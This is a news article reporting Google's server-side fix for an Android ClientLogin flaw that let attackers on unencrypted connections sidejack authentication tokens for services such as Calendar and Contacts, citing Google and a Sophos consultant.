Google Issues Fix For Android ClientLogin Authentication Flaw

serious ClientLogin authentication protocol vulnerability in its Android operating system

Google said it would start implementing a server-side patch last week, which will be automatically installed on Android operating systems without any user interaction.

"We're starting to roll out a fix which addresses a potential security flaw that could, under certain circumstances, allow a third party access to data available in calendar and contacts. This fix requires no action from users and will roll out globally over the next few days," Google said in a statement last week.

"The great news is that it doesn't require a software update on the Android devices themselves - meaning the fix is automatic and worldwide. Effectively this is a silent fix," said Graham Cluley, Sophos senior technology consultant, in a blog post .

The security flaw, detected earlier this month by researchers from the University of Ulm in Germany, occurred in the way that Android apps use the ClientLogin authentication feature to access any number of Google services. Security experts contend that the flaw affects at least 97 percent of Android smartphones.

Sponsored post

During a sidejacking attack, hackers could capture authentication tokens if the authToken request is sent over an unencrypted http connection for any Google service that uses the ClientLogin protocol. Hackers could then impersonate a user to log onto numerous personal Web applications such as Google Calendar, Contacts, and Picassa as well as third party apps such as Facebook and Twitter.

The server-side fix will essentially equip Android with the more secure HTTPS protocol when connecting to the Internet. The HTTPS automatically encrypts transmitted data when users access Web services such as Google Calendar, subsequently preventing authentication tokens from being intercepted by hackers.

While Android OS users running the latest version 2.3.4 are protected against these kinds of sidejacking attacks, the vast majority are still using the vulnerable older versions of the operating system.

Thus far, no active attacks exploiting Android's ClientLogin authentication flaw have been detected in the wild.